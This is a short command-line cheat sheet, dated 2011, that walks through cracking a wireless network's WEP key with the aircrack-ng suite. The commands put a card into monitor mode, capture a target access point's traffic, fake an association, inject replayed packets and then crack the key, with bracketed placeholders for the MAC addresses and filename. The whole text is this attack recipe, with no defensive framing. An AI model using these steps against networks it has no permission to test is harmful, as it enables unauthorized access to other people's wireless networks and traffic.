apt-get install aircrack-ng #install aircrack-ng.airmon-ng start wlan0 #Switch wireless card to monitor mode.airodump-ng mon0 #List wireless AP.airodump-ng -c [channel] --bssid [mac address of AP] -w [filename] mon0 #catch wireless packets**aireplay-ng -1 0 -a [mac address of AP] -h [mac address of Host] mon0 #create virtual connection between wireless APaireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b [mac address of AP] -h [mac address of Host] mon0 #Sent packets to APaircrack-ng [filename].cap #crack wep key.
2011-04-01